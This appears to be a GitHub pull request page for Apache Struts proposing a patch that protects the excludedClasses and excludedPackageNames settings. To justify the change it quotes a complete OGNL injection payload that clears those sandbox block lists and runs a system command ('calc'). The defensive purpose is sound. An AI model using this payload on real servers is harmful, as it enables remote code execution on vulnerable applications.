struts icon indicating copy to clipboard operation
struts copied to clipboard

Published 20 hours ago verified publisher icon apache

[WW-5186]protect excludedClasses and excludedPackageNames

Open k4n5ha0 opened this issue 2 years ago • 1 comments

block unknow exp to clean excludedPackageNames and excludedClasses if attacker use 'excluded'+'PackageNames' likes blow, this patch can protect structs

%{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))
}

cc8c477544de5261433ed941d0f70265_172753743-a2d50b96-165f-454b-9179-4442732dd510

k4n5ha0 avatar Jun 12 '22 02:06 k4n5ha0

Coverage Status

Coverage increased (+0.003%) to 50.637% when pulling 3a7cc3db62dc914ea47d94539d549c2ee2791c91 on k4n5ha0:patch-7 into 4b3ee53f939ac040b6d5351591eace6023d78514 on apache:master.

coveralls avatar Jun 12 '22 02:06 coveralls